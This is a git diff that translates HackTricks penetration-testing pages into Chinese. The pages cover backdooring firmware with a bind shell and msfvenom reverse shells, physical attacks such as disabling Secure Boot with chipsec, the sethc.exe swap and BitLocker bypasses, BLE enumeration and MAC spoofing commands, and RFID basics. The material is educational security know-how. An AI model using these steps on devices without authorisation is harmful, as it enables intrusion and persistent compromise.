+## 固件完整性
 
-The **custom firmware and/or compiled binaries can be uploaded to exploit integrity or signature verification flaws**. The following steps can be followed for backdoor bind shell compilation:
+**自定义固件和/或编译的二进制文件可以被上传以利用完整性或签名验证缺陷**。可以按照以下步骤进行后门绑定 shell 编译：
 
-1. The firmware can be extracted using firmware-mod-kit (FMK).
-2. The target firmware architecture and endianness should be identified.
-3. A cross compiler can be built using Buildroot or other suitable methods for the environment.
-4. The backdoor can be built using the cross compiler.
-5. The backdoor can be copied to the extracted firmware /usr/bin directory.
-6. The appropriate QEMU binary can be copied to the extracted firmware rootfs.
-7. The backdoor can be emulated using chroot and QEMU.
-8. The backdoor can be accessed via netcat.
-9. The QEMU binary should be removed from the extracted firmware rootfs.
-10. The modified firmware can be repackaged using FMK.
-11. The backdoored firmware can be tested by emulating it with firmware analysis toolkit (FAT) and connecting to the target backdoor IP and port using netcat.
+1. 可以使用 firmware-mod-kit (FMK) 提取固件。
+2. 应识别目标固件的架构和字节序。
+3. 可以使用 Buildroot 或其他适合环境的方法构建交叉编译器。
+4. 可以使用交叉编译器构建后门。
+5. 可以将后门复制到提取的固件 /usr/bin 目录。
+6. 可以将适当的 QEMU 二进制文件复制到提取的固件 rootfs。
+7. 可以使用 chroot 和 QEMU 模拟后门。
+8. 可以通过 netcat 访问后门。
+9. 应从提取的固件 rootfs 中删除 QEMU 二进制文件。
+10. 可以使用 FMK 重新打包修改后的固件。
+11. 可以通过使用固件分析工具包 (FAT) 模拟后门固件，并使用 netcat 连接到目标后门 IP 和端口来测试后门固件。
 
-If a root shell has already been obtained through dynamic analysis, bootloader manipulation, or hardware security testing, precompiled malicious binaries such as implants or reverse shells can be executed. Automated payload/implant tools like the Metasploit framework and 'msfvenom' can be leveraged using the following steps:
+如果已经通过动态分析、引导加载程序操作或硬件安全测试获得了 root shell，可以执行预编译的恶意二进制文件，如植入物或反向 shell。可以使用以下步骤利用自动化有效载荷/植入工具，如 Metasploit 框架和 'msfvenom'：
 
-1. The target firmware architecture and endianness should be identified.
-2. Msfvenom can be used to specify the target payload, attacker host IP, listening port number, filetype, architecture, platform, and the output file.
-3. The payload can be transferred to the compromised device and ensured that it has execution permissions.
-4. Metasploit can be prepared to handle incoming requests by starting msfconsole and configuring the settings according to the payload.
-5. The meterpreter reverse shell can be executed on the compromised device.
-6. Meterpreter sessions can be monitored as they open.
-7. Post-exploitation activities can be performed.
+1. 应识别目标固件的架构和字节序。
+2. 可以使用 msfvenom 指定目标有效载荷、攻击者主机 IP、监听端口号、文件类型、架构、平台和输出文件。
+3. 可以将有效载荷传输到被攻陷的设备，并确保其具有执行权限。
+4. 可以通过启动 msfconsole 并根据有效载荷配置设置来准备 Metasploit 处理传入请求。
+5. 可以在被攻陷的设备上执行 meterpreter 反向 shell。
+6. 可以监控 meterpreter 会话的开启情况。
+7. 可以执行后渗透活动。
 
-If possible, vulnerabilities within startup scripts can be exploited to gain persistent access to a device across reboots. These vulnerabilities arise when startup scripts reference, [symbolically link](https://www.chromium.org/chromium-os/chromiumos-design-docs/hardening-against-malicious-stateful-data), or depend on code located in untrusted mounted locations such as SD cards and flash volumes used for storing data outside of root filesystems.
+如果可能，可以利用启动脚本中的漏洞以在重启后获得对设备的持久访问。这些漏洞在启动脚本引用、[符号链接](https://www.chromium.org/chromium-os/chromiumos-design-docs/hardening-against-malicious-stateful-data)或依赖于位于不受信任的挂载位置（如用于存储根文件系统外数据的 SD 卡和闪存卷）中的代码时出现。
 
-## References
+## 参考文献
 
-- For further information check [https://scriptingxss.gitbook.io/firmware-security-testing-methodology/](https://scriptingxss.gitbook.io/firmware-security-testing-methodology/)
+- 有关更多信息，请查看 [https://scriptingxss.gitbook.io/firmware-security-testing-methodology/](https://scriptingxss.gitbook.io/firmware-security-testing-methodology/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/physical-attacks/physical-attacks.md b/src/physical-attacks/physical-attacks.md
index 3b46d1808..f05fe3272 100644
--- a/src/physical-attacks/physical-attacks.md
+++ b/src/physical-attacks/physical-attacks.md
@@ -1,58 +1,57 @@
-# Physical Attacks
+# 物理攻击
 
 {{#include ../banners/hacktricks-training.md}}
 
-## BIOS Password Recovery and System Security
+## BIOS 密码恢复和系统安全
 
-**Resetting the BIOS** can be achieved in several ways. Most motherboards include a **battery** that, when removed for around **30 minutes**, will reset the BIOS settings, including the password. Alternatively, a **jumper on the motherboard** can be adjusted to reset these settings by connecting specific pins.
+**重置 BIOS** 可以通过几种方式实现。大多数主板都包含一个 **电池**，当移除约 **30 分钟** 后，将重置 BIOS 设置，包括密码。或者，可以通过调整 **主板上的跳线** 来重置这些设置，方法是连接特定的引脚。
 
-For situations where hardware adjustments are not possible or practical, **software tools** offer a solution. Running a system from a **Live CD/USB** with distributions like **Kali Linux** provides access to tools like **_killCmos_** and **_CmosPWD_**, which can assist in BIOS password recovery.
+对于无法或不实用进行硬件调整的情况，**软件工具** 提供了解决方案。使用 **Kali Linux** 等发行版从 **Live CD/USB** 运行系统，可以访问像 **_killCmos_** 和 **_CmosPWD_** 这样的工具，帮助进行 BIOS 密码恢复。
 
-In cases where the BIOS password is unknown, entering it incorrectly **three times** will typically result in an error code. This code can be used on websites like [https://bios-pw.org](https://bios-pw.org) to potentially retrieve a usable password.
+在 BIOS 密码未知的情况下，错误输入 **三次** 通常会导致错误代码。可以在像 [https://bios-pw.org](https://bios-pw.org) 这样的网站上使用此代码来检索可用的密码。
 
-### UEFI Security
+### UEFI 安全
 
-For modern systems using **UEFI** instead of traditional BIOS, the tool **chipsec** can be utilized to analyze and modify UEFI settings, including the disabling of **Secure Boot**. This can be accomplished with the following command:
+对于使用 **UEFI** 而非传统 BIOS 的现代系统，可以利用工具 **chipsec** 来分析和修改 UEFI 设置，包括禁用 **安全启动**。可以使用以下命令完成此操作：
 
 `python chipsec_main.py -module exploits.secure.boot.pk`
 
-### RAM Analysis and Cold Boot Attacks
+### RAM 分析和冷启动攻击
 
-RAM retains data briefly after power is cut, usually for **1 to 2 minutes**. This persistence can be extended to **10 minutes** by applying cold substances, such as liquid nitrogen. During this extended period, a **memory dump** can be created using tools like **dd.exe** and **volatility** for analysis.
+在断电后，RAM 会短暂保留数据，通常为 **1 到 2 分钟**。通过施加冷物质，如液氮，可以将这种持续时间延长至 **10 分钟**。在此延长期间，可以使用像 **dd.exe** 和 **volatility** 这样的工具创建 **内存转储** 进行分析。
 
-### Direct Memory Access (DMA) Attacks
+### 直接内存访问 (DMA) 攻击
 
-**INCEPTION** is a tool designed for **physical memory manipulation** through DMA, compatible with interfaces like **FireWire** and **Thunderbolt**. It allows for bypassing login procedures by patching memory to accept any password. However, it's ineffective against **Windows 10** systems.
+**INCEPTION** 是一个旨在通过 DMA 进行 **物理内存操作** 的工具，兼容 **FireWire** 和 **Thunderbolt** 等接口。它允许通过修补内存以接受任何密码来绕过登录程序。然而，它对 **Windows 10** 系统无效。
 
-### Live CD/USB for System Access
+### Live CD/USB 进行系统访问
 
-Changing system binaries like **_sethc.exe_** or **_Utilman.exe_** with a copy of **_cmd.exe_** can provide a command prompt with system privileges. Tools such as **chntpw** can be used to edit the **SAM** file of a Windows installation, allowing password changes.
+通过用 **_cmd.exe_** 的副本替换系统二进制文件，如 **_sethc.exe_** 或 **_Utilman.exe_**，可以提供具有系统权限的命令提示符。可以使用 **chntpw** 等工具编辑 Windows 安装的 **SAM** 文件，从而允许更改密码。
 
-**Kon-Boot** is a tool that facilitates logging into Windows systems without knowing the password by temporarily modifying the Windows kernel or UEFI. More information can be found at [https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/).
+**Kon-Boot** 是一个工具，可以在不知道密码的情况下登录 Windows 系统，通过临时修改 Windows 内核或 UEFI。更多信息可以在 [https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/) 找到。
 
-### Handling Windows Security Features
+### 处理 Windows 安全功能
 
-#### Boot and Recovery Shortcuts
+#### 启动和恢复快捷键
 
-- **Supr**: Access BIOS settings.
-- **F8**: Enter Recovery mode.
-- Pressing **Shift** after the Windows banner can bypass autologon.
+- **Supr**: 访问 BIOS 设置。
+- **F8**: 进入恢复模式。
+- 在 Windows 横幅后按 **Shift** 可以绕过自动登录。
 
-#### BAD USB Devices
+#### BAD USB 设备
 
-Devices like **Rubber Ducky** and **Teensyduino** serve as platforms for creating **bad USB** devices, capable of executing predefined payloads when connected to a target computer.
+像 **Rubber Ducky** 和 **Teensyduino** 这样的设备作为创建 **坏 USB** 设备的平台，能够在连接到目标计算机时执行预定义的有效载荷。
 
-#### Volume Shadow Copy
+#### 卷影副本
 
-Administrator privileges allow for the creation of copies of sensitive files, including the **SAM** file, through PowerShell.
+管理员权限允许通过 PowerShell 创建敏感文件的副本，包括 **SAM** 文件。
 
-### Bypassing BitLocker Encryption
+### 绕过 BitLocker 加密
 
-BitLocker encryption can potentially be bypassed if the **recovery password** is found within a memory dump file (**MEMORY.DMP**). Tools like **Elcomsoft Forensic Disk Decryptor** or **Passware Kit Forensic** can be utilized for this purpose.
+如果在内存转储文件 (**MEMORY.DMP**) 中找到 **恢复密码**，则可能绕过 BitLocker 加密。可以使用像 **Elcomsoft Forensic Disk Decryptor** 或 **Passware Kit Forensic** 这样的工具来实现这一目的。
 
-### Social Engineering for Recovery Key Addition
+### 社会工程学用于恢复密钥添加
 
-A new BitLocker recovery key can be added through social engineering tactics, convincing a user to execute a command that adds a new recovery key composed of zeros, thereby simplifying the decryption process.
+可以通过社会工程学策略添加新的 BitLocker 恢复密钥，说服用户执行一个命令，添加一个由零组成的新恢复密钥，从而简化解密过程。
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/radio-hacking/README.md b/src/radio-hacking/README.md
index 3ce0def86..6131e8de1 100644
--- a/src/radio-hacking/README.md
+++ b/src/radio-hacking/README.md
@@ -1,4 +1 @@
-# Radio Hacking
-
-
-
+# 无线电黑客技术
diff --git a/src/radio-hacking/low-power-wide-area-network.md b/src/radio-hacking/low-power-wide-area-network.md
index ea4953a97..5203b42ea 100644
--- a/src/radio-hacking/low-power-wide-area-network.md
+++ b/src/radio-hacking/low-power-wide-area-network.md
@@ -1,17 +1,16 @@
-# Low-Power Wide Area Network
+# 低功耗广域网
 
 {{#include ../banners/hacktricks-training.md}}
 
-## Introduction
+## 介绍
 
-**Low-Power Wide Area Network** (LPWAN) is a group of wireless, low-power, wide area network technologies designed for **long-range communications** at a low bit rate.\
-They can reach more than **six miles** and their **batteries** can last up to **20 years**.
+**低功耗广域网** (LPWAN) 是一组无线、低功耗、广域网技术，旨在实现**长距离通信**，并具有低比特率。\
+它们的通信距离超过**六英里**，其**电池**寿命可达**20年**。
 
-Long Range (**LoRa**) it’s popular in multiple countries and has an open source specification called **LoRaWAN**.
+长距离 (**LoRa**) 在多个国家中很受欢迎，并具有一个名为 **LoRaWAN** 的开源规范。
 
-### LPWAN, LoRa, and LoRaWAN
+### LPWAN、LoRa 和 LoRaWAN
 
 [https://github.com/IOActive/laf](https://github.com/IOActive/laf)
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/radio-hacking/pentesting-ble-bluetooth-low-energy.md b/src/radio-hacking/pentesting-ble-bluetooth-low-energy.md
index e2e4fcd76..5cc737ed0 100644
--- a/src/radio-hacking/pentesting-ble-bluetooth-low-energy.md
+++ b/src/radio-hacking/pentesting-ble-bluetooth-low-energy.md
@@ -1,23 +1,22 @@
 {{#include ../banners/hacktricks-training.md}}
 
-# Introduction
+# 介绍
 
-Available since the Bluetooth 4.0 specification, BLE uses only 40 channels, covering the range of 2400 to 2483.5 MHz. In contrast, traditional Bluetooth uses 79 channels in that same range.
+自Bluetooth 4.0规范以来，BLE仅使用40个频道，覆盖2400到2483.5 MHz的范围。相比之下，传统蓝牙在同一范围内使用79个频道。
 
-BLE devices communicate is by sending **advertising packets** (**beacons**), these packets broadcast the BLE device’s existence to other nearby devices. These beacons sometimes **send data**, too.
+BLE设备通过发送**广告数据包**（**信标**）进行通信，这些数据包向其他附近设备广播BLE设备的存在。这些信标有时也会**发送数据**。
 
-The listening device, also called a central device, can respond to an advertising packet with a **SCAN request** sent specifically to the advertising device. The **response** to that scan uses the same structure as the **advertising** packet with additional information that couldn’t fit on the initial advertising request, such as the full device name.
+监听设备，也称为中央设备，可以通过向广告设备发送特定的**扫描请求**来响应广告数据包。对该扫描的**响应**使用与**广告**数据包相同的结构，并包含无法在初始广告请求中容纳的附加信息，例如完整的设备名称。
 
 ![](<../images/image (201) (2) (1) (1).png>)
 
-The preamble byte synchronizes the frequency, whereas the four-byte access address is a **connection identifier**, which is used in scenarios where multiple devices are trying to establish connections on the same channels. Next, the Protocol Data Unit (**PDU**) contains the **advertising data**. There are several types of PDU; the most commonly used are ADV_NONCONN_IND and ADV_IND. Devices use the **ADV_NONCONN_IND** PDU type if they **don’t accept connections**, transmitting data only in the advertising packet. Devices use **ADV_IND** if they **allow connections** and **stop sending advertising** packets once a **connection** has been **established**.
+前导字节用于同步频率，而四字节访问地址是一个**连接标识符**，用于多个设备尝试在同一频道上建立连接的场景。接下来，协议数据单元（**PDU**）包含**广告数据**。PDU有几种类型；最常用的是ADV_NONCONN_IND和ADV_IND。如果设备**不接受连接**，则使用**ADV_NONCONN_IND** PDU类型，仅在广告数据包中传输数据。如果设备**允许连接**，并且在**建立连接**后**停止发送广告**数据包，则使用**ADV_IND**。
 
 ## GATT
 
-The **Generic Attribute Profile** (GATT) defines how the **device should format and transfer data**. When you’re analyzing a BLE device’s attack surface, you’ll often concentrate your attention on the GATT (or GATTs), because it’s how **device functionality gets triggered** and how data gets stored, grouped, and modified. The GATT lists a device’s characteristics, descriptors, and services in a table as either 16- or 32-bits values. A **characteristic** is a **data** value **sent** between the central device and peripheral. These characteristics can have **descriptors** that **provide additional information about them**. **Characteristics** are often **grouped** in **services** if they’re related to performing a particular action.
-
-# Enumeration
+**通用属性配置文件**（GATT）定义了**设备应如何格式化和传输数据**。当您分析BLE设备的攻击面时，您通常会将注意力集中在GATT（或GATTs）上，因为它是**设备功能触发**和数据存储、分组和修改的方式。GATT以表格形式列出设备的特征、描述符和服务，值为16位或32位。**特征**是**在**中央设备和外围设备之间**发送**的数据值。这些特征可以具有**描述符**，以**提供有关它们的附加信息**。如果特征与执行特定操作相关，则通常在**服务**中**分组**这些**特征**。
 
+# 枚举
 ```bash
 hciconfig #Check config, check if UP or DOWN
 # If DOWN try:
@@ -27,20 +26,18 @@ sudo hciconfig hci0 down && sudo hciconfig hci0 up
 # Spoof MAC
 spooftooph -i hci0 -a 11:22:33:44:55:66
 ```
-
 ## GATTool
 
-**GATTool** allows to **establish** a **connection** with another device, listing that device’s **characteristics**, and reading and writing its attributes.\
-GATTTool can launch an interactive shell with the `-I` option:
-
+**GATTool** 允许 **建立** 与另一个设备的 **连接**，列出该设备的 **特性**，并读取和写入其属性。\
+GATTTool 可以使用 `-I` 选项启动交互式 shell：
 ```bash
 gatttool -i hci0 -I
 [ ][LE]> connect 24:62:AB:B1:A8:3E Attempting to connect to A4:CF:12:6C:B3:76 Connection successful
 [A4:CF:12:6C:B3:76][LE]> characteristics
-  handle: 0x0002, char properties: 0x20, char value handle:
-  0x0003, uuid: 00002a05-0000-1000-8000-00805f9b34fb
-  handle: 0x0015, char properties: 0x02, char value handle:
-  0x0016, uuid: 00002a00-0000-1000-8000-00805f9b34fb
+handle: 0x0002, char properties: 0x20, char value handle:
+0x0003, uuid: 00002a05-0000-1000-8000-00805f9b34fb
+handle: 0x0015, char properties: 0x02, char value handle:
+0x0016, uuid: 00002a00-0000-1000-8000-00805f9b34fb
 [...]
 
 # Write data
@@ -53,9 +50,7 @@ gatttool -i <Bluetooth adapter interface> -b <MAC address of device> --char-read
 # Read connecting with an authenticated encrypted connection
 gatttool --sec-level=high -b a4:cf:12:6c:b3:76 --char-read -a 0x002c
 ```
-
 ## Bettercap
-
 ```bash
 # Start listening for beacons
 sudo bettercap --eval "ble.recon on"
@@ -67,6 +62,4 @@ sudo bettercap --eval "ble.recon on"
 >> ble.write <MAC ADDR> <UUID> <HEX DATA>
 >> ble.write <mac address of device> ff06 68656c6c6f # Write "hello" in ff06
 ```
-
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/radio-hacking/pentesting-rfid.md b/src/radio-hacking/pentesting-rfid.md
index ab61000e2..cba71f5cc 100644
--- a/src/radio-hacking/pentesting-rfid.md
+++ b/src/radio-hacking/pentesting-rfid.md
@@ -4,28 +4,28 @@
 
 ## Introduction
 
-**Radio Frequency Identification (RFID)** is the most popular short-range radio solution. It's usually used to store and transmit information that identifies an entity.
+**射频识别 (RFID)** 是最流行的短距离无线解决方案。它通常用于存储和传输识别实体的信息。
 
-An RFID tag can rely on **its own power source (active)**, such as an embedded battery, or receive its power from the reading antenna using the current **induced from the received radio waves** (**passive**).
+RFID 标签可以依赖于 **自身电源 (主动)**，例如嵌入式电池，或通过读取天线接收来自接收无线电波的电流 **供电 (被动)**。
 
 ### Classes
 
-EPCglobal divides RFID tags into six categories. A tag in each category has all the capabilities listed in the previous category, making it backward compatible.
+EPCglobal 将 RFID 标签分为六类。每个类别中的标签都具备前一类别中列出的所有功能，从而实现向后兼容。
 
-- **Class 0** tags are **passive** tags that operate in **UHF** bands. The vendor **preprograms** them at the production factory. As a result, you **can’t change** the information stored in their memory.
-- **Class 1** tags can also operate in **HF** bands. In addition, they can be **written only once** after production. Many Class 1 tags can also process **cyclic redundancy checks** (CRCs) of the commands they receive. CRCs are a few extra bytes at the end of the commands for error detection.
-- **Class 2** tags can be **written multiple times**.
-- **Class 3** tags can contain **embedded sensors** that can record environmental parameters, such as the current temperature or the tag’s motion. These tags are **semi-passive**, because although they **have** an embedded power source, such as an integrated **battery**, they **can’t initiate** wireless **communication** with other tags or readers.
-- **Class 4** tags can initiate communication with other tags of the same class, making them **active tags**.
-- **Class 5** tags can provide **power to other tags and communicate with all the previous tag** classes. Class 5 tags can act as **RFID readers**.
+- **Class 0** 标签是 **被动** 标签，工作在 **UHF** 频段。供应商在生产工厂 **预编程** 它们。因此，您 **无法更改** 存储在其内存中的信息。
+- **Class 1** 标签也可以在 **HF** 频段工作。此外，它们在生产后只能 **写入一次**。许多 Class 1 标签还可以处理接收到的命令的 **循环冗余检查** (CRCs)。CRC 是命令末尾的几个额外字节，用于错误检测。
+- **Class 2** 标签可以 **多次写入**。
+- **Class 3** 标签可以包含 **嵌入式传感器**，记录环境参数，例如当前温度或标签的运动。这些标签是 **半主动** 的，因为尽管它们 **具有** 嵌入式电源，例如集成 **电池**，但它们 **无法发起** 与其他标签或读取器的无线 **通信**。
+- **Class 4** 标签可以与同类的其他标签发起通信，使其成为 **主动标签**。
+- **Class 5** 标签可以为其他标签提供 **电源并与所有先前的标签** 类别进行通信。Class 5 标签可以充当 **RFID 读取器**。
 
 ### Information Stored in RFID Tags
 
-An RFID tag’s memory usually stores four kinds of data: the **identification data**, which **identifies** the **entity** to which the tag is attached (this data includes user-defined fields, such as bank accounts); the **supplementary data**, which provides **further** **details** regarding the entity; the **control data**, used for the tag’s internal **configuration**; and the tag’s **manufacturer data**, which contains a tag’s Unique Identifier (**UID**) and details regarding the tag’s **production**, **type**, and **vendor**. You’ll find the first two kinds of data in all the commercial tags; the last two can differ based on the tag’s vendor.
+RFID 标签的内存通常存储四种数据：**识别数据**，用于 **识别** 标签所附着的 **实体**（这些数据包括用户定义的字段，例如银行账户）；**补充数据**，提供有关实体的 **进一步** **细节**；**控制数据**，用于标签的内部 **配置**；以及标签的 **制造商数据**，其中包含标签的唯一标识符 (**UID**) 以及有关标签的 **生产**、**类型** 和 **供应商** 的详细信息。您会在所有商业标签中找到前两种数据；后两种数据可能会根据标签的供应商而有所不同。
 
-The ISO standard specifies the Application Family Identifier (**AFI**) value, a code that indicates the **kind of object** the tag belongs to. Another important register, also specified by ISO, is the Data Storage Format Identifier(**DSFID**), which defines the **logical organization of the user data**.
+ISO 标准规定了应用程序系列标识符 (**AFI**) 值，这是一个指示标签所属 **对象类型** 的代码。另一个由 ISO 规定的重要寄存器是数据存储格式标识符 (**DSFID**)，它定义了 **用户数据的逻辑组织**。
 
-Most RFID **security controls** have mechanisms that **restrict** the **read** or **write** operations on each user memory block and on the special registers containing the AFI and DSFID values. These **lock** **mechanisms** use data stored in the control memory and have **default passwords** preconfigured by the vendor but allow the tag owners to **configure custom passwords**.
+大多数 RFID **安全控制** 具有机制，**限制** 每个用户内存块以及包含 AFI 和 DSFID 值的特殊寄存器上的 **读取** 或 **写入** 操作。这些 **锁定** **机制** 使用存储在控制内存中的数据，并具有供应商预配置的 **默认密码**，但允许标签所有者 **配置自定义密码**。
 
 ### Low & High frequency tags comparison
 
@@ -33,25 +33,25 @@ Most RFID **security controls** have mechanisms that **restrict** the **read** o
 
 ## Low-Frequency RFID Tags (125kHz)
 
-**Low-frequency tags** are often used in systems that **do not require high security**: building access, intercom keys, gym membership cards, etc. Due to their higher range, they are convenient to use for paid car parking: the driver does not need to bring the card close to the reader, as it is triggered from further away. At the same time, low-frequency tags are very primitive, they have a low data transfer rate. For that reason, it's impossible to implement complex two-way data transfer for such things as keeping balance and cryptography. Low-frequency tags only transmit their short ID without any means of authentication.
+**低频标签** 通常用于 **不需要高安全性** 的系统：建筑物访问、对讲机钥匙、健身会员卡等。由于其较高的范围，它们在付费停车时使用方便：司机无需将卡靠近读取器，因为它可以在更远的地方触发。同时，低频标签非常原始，数据传输速率低。因此，无法实现复杂的双向数据传输，例如保持余额和加密。低频标签仅传输其短 ID，而没有任何身份验证手段。
 
-These devices rely on **passive** **RFID** technology and operate in a **range of 30 kHz to 300 kHz**, although it's more usual to use 125 kHz to 134 kHz:
+这些设备依赖于 **被动** **RFID** 技术，工作在 **30 kHz 到 300 kHz** 的范围内，尽管更常用的是 125 kHz 到 134 kHz：
 
-- **Long Range** — lower frequency translates to higher range. There are some EM-Marin and HID readers, which work from a distance of up to a meter. These are often used in car parking.
-- **Primitive protocol** — due to the low data transfer rate these tags can only transmit their short ID. In most cases, data is not authenticated and it's not protected in any way. As soon as the card is in the range of the reader it just starts transmitting its ID.
-- **Low security** — These cards can be easily copied, or even read from somebody else's pocket due to the protocol's primitiveness.
+- **长距离** — 较低的频率意味着更高的范围。有一些 EM-Marin 和 HID 读取器，可以在距离达一米的地方工作。这些通常用于停车场。
+- **原始协议** — 由于数据传输速率低，这些标签只能传输其短 ID。在大多数情况下，数据没有经过身份验证，也没有以任何方式受到保护。只要卡在读取器的范围内，它就会开始传输其 ID。
+- **低安全性** — 这些卡可以很容易地被复制，甚至可以从其他人的口袋中读取，因为协议的原始性。
 
-**Popular 125 kHz protocols:**
+**流行的 125 kHz 协议：**
 
-- **EM-Marin** — EM4100, EM4102. The most popular protocol in CIS. Can be read from about a meter because of its simplicity and stability.
-- **HID Prox II** — low-frequency protocol introduced by HID Global. This protocol is more popular in the western countries. It is more complex and the cards and readers for this protocol are relatively expensive.
-- **Indala** — very old low-frequency protocol that was introduced by Motorola, and later acquired by HID. You are less likely to encounter it in the wild compared to the previous two because it is falling out of use.
+- **EM-Marin** — EM4100，EM4102。CIS 中最流行的协议。由于其简单性和稳定性，可以在约一米的距离内读取。
+- **HID Prox II** — HID Global 引入的低频协议。该协议在西方国家更为流行。它更复杂，且该协议的卡和读取器相对昂贵。
+- **Indala** — 由摩托罗拉引入的非常古老的低频协议，后来被 HID 收购。与前两者相比，您在野外遇到它的可能性较小，因为它正在逐渐被淘汰。
 
-In reality, there are a lot more low-frequency protocols. But they all use the same modulation on the physical layer and may be considered, in one way or another, a variation of those listed above.
+实际上，还有更多低频协议。但它们都在物理层上使用相同的调制方式，并且可以被视为上述协议的某种变体。
 
 ### Attack
 
-You can **attack these Tags with the Flipper Zero**:
+您可以 **使用 Flipper Zero 攻击这些标签**：
 
 {{#ref}}
 ../todo/radio-hacking/flipper-zero/fz-125khz-rfid.md
@@ -59,34 +59,34 @@ You can **attack these Tags with the Flipper Zero**:
 
 ## High-Frequency RFID Tags (13.56 MHz)
 
-**High-frequency tags** are used for a more complex reader-tag interaction when you need cryptography, a large two-way data transfer, authentication, etc.\
-It's usually found in bank cards, public transport, and other secure passes.
+**高频标签** 用于更复杂的读取器-标签交互，当您需要加密、大量双向数据传输、身份验证等时。\
+它通常出现在银行卡、公共交通和其他安全通行证中。
 
-**High-frequency 13.56 MHz tags are a set of standards and protocols**. They are usually referred to as [NFC](https://nfc-forum.org/what-is-nfc/about-the-technology/), but that's not always correct. The basic protocol set used on the physical and logical levels is ISO 14443. High-level protocols, as well as alternative standards (like ISO 19092), are based upon it. Many people refer to this technology as **Near Field Communication (NFC)**, a term for devices operating over the 13.56 MHz frequency.
+**高频 13.56 MHz 标签是一组标准和协议**。它们通常被称为 [NFC](https://nfc-forum.org/what-is-nfc/about-the-technology/)，但这并不总是正确。物理和逻辑层上使用的基本协议集是 ISO 14443。高级协议以及替代标准（如 ISO 19092）基于此。许多人将此技术称为 **近场通信 (NFC)**，这是指在 13.56 MHz 频率上运行的设备。
 
 <figure><img src="../images/image (22).png" alt=""><figcaption></figcaption></figure>
 
-To put it simply, NFC's architecture works like this: the transmission protocol is chosen by the company making the cards and implemented based on the low-level ISO 14443. For example, NXP invented its own high-level transmission protocol called Mifare. But on the lower level, Mifare cards are based on ISO 14443-A standard.
+简单来说，NFC 的架构是这样的：传输协议由制造卡片的公司选择，并基于低级 ISO 14443 实现。例如，NXP 发明了自己的高级传输协议，称为 Mifare。但在较低层面上，Mifare 卡基于 ISO 14443-A 标准。
 
-Flipper can interact with both the low-level ISO 14443 protocol, as well as Mifare Ultralight data transfer protocol and EMV used in bank cards. We're working on adding support for Mifare Classic and NFC NDEF. A thorough look at the protocols and standards that make up NFC is worth a separate article which we plan to have up later.
+Flipper 可以与低级 ISO 14443 协议以及 Mifare Ultralight 数据传输协议和用于银行卡的 EMV 进行交互。我们正在努力添加对 Mifare Classic 和 NFC NDEF 的支持。深入研究构成 NFC 的协议和标准值得单独撰写一篇文章，我们计划稍后发布。
 
-All high-frequency cards based on ISO 14443-A standard have a unique chip ID. It acts as the card's serial number, like a network card's MAC address. **Usually, the UID is 4 or 7 bytes long**, but can rarely go **up to 10**. UIDs are not a secret and they are easily readable, **sometimes even printed on the card itself**.
+所有基于 ISO 14443-A 标准的高频卡都有一个唯一的芯片 ID。它充当卡的序列号，类似于网络卡的 MAC 地址。**通常，UID 长度为 4 或 7 字节**，但很少可以 **达到 10**。UID 不是秘密，且易于读取，**有时甚至印在卡片上**。
 
-There are many access control systems that rely on UID to **authenticate and grant access**. Sometimes this happens **even** when RFID tags **support cryptography**. Such **misuse** brings them down to the level of the dumb **125 kHz cards** in terms of **security**. Virtual cards (like Apple Pay) use a dynamic UID so that phone owners won't go opening doors with their payment app.
+有许多访问控制系统依赖 UID 来 **进行身份验证和授予访问**。有时即使 RFID 标签 **支持加密**，这也会发生。这种 **误用** 使它们在 **安全性** 上降至愚蠢的 **125 kHz 卡** 的水平。虚拟卡（如 Apple Pay）使用动态 UID，以便手机用户不会用他们的支付应用打开门。
 
-- **Low range** — high-frequency cards are specifically designed so that they would have to be placed close to the reader. This also helps to protect the card from unauthorized interactions. The maximum read range that we managed to achieve was about 15 cm, and that was with custom-made high-range readers.
-- **Advanced protocols** — data transfer speeds up to 424 kbps allow complex protocols with full-fledged two-way data transfer. Which in turn **allows cryptography**, data transfer, etc.
-- **High security** — high-frequency contactless cards are in no way inferior to smart cards. There are cards that support cryptographically strong algorithms like AES and implement asymmetrical cryptography.
+- **低范围** — 高频卡专门设计为必须靠近读取器放置。这也有助于保护卡免受未经授权的交互。我们所能达到的最大读取范围约为 15 厘米，而这还是使用定制的高范围读取器。
+- **高级协议** — 数据传输速度高达 424 kbps，允许复杂的协议进行完整的双向数据传输。这反过来 **允许加密**、数据传输等。
+- **高安全性** — 高频非接触卡在任何方面都不逊色于智能卡。有些卡支持强加密算法，如 AES，并实现非对称加密。
 
 ### Attack
 
-You can **attack these Tags with the Flipper Zero**:
+您可以 **使用 Flipper Zero 攻击这些标签**：
 
 {{#ref}}
 ../todo/radio-hacking/flipper-zero/fz-nfc.md
 {{#endref}}
 
-Or using the **proxmark**:
+或者使用 **proxmark**：
 
 {{#ref}}
 ../todo/radio-hacking/proxmark-3.md
@@ -97,4 +97,3 @@ Or using the **proxmark**:
 - [https://blog.flipperzero.one/rfid/](https://blog.flipperzero.one/rfid/)
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/README.md
index 5383590f1..ada3d47d7 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/README.md
@@ -1,4 +1 @@
-# Arbitrary Write 2 Exec
-
-
-
+# 任意写入 2 执行
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-__malloc_hook.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-__malloc_hook.md
index b34e56591..81640be35 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-__malloc_hook.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-__malloc_hook.md
@@ -4,18 +4,18 @@
 
 ## **Malloc Hook**
 
